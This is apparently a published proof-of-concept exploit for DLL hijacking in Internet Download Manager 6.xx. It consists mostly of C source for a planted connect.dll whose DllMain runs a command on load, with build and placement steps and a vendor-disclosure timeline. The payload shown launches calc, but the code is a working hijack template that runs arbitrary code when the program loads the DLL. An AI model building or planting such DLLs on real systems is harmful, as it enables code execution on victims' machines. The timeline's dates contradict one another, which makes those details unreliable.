/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Internet Download Manager 6.XX DLL Hijacking #[+] Date: 30-03-2015 #[+] Type: Local Exploits #[+] Vendor: http://www.internetdownloadmanager.com/ #[+] Tested on: WinXp #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] POC IMG:http://i.imgur.com/qfkEFR8.png (VNCInject) #[+] gcc -shared -o connect.dll dllhijack.c #[+] create .ef2 file and put it with connect.dll in the same dir.calc.exe will popup #[+]Proof of Concept (PoC): #[+]Timle Line: 07/04/2015:Vulnerability was discovered. 09/04/2015: Contact with vendor. 10/04/2015: No reply. 11/04/2015: Vendor Refused to patch the vulnerability. 2014-15-03: Vulnerability Published ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; }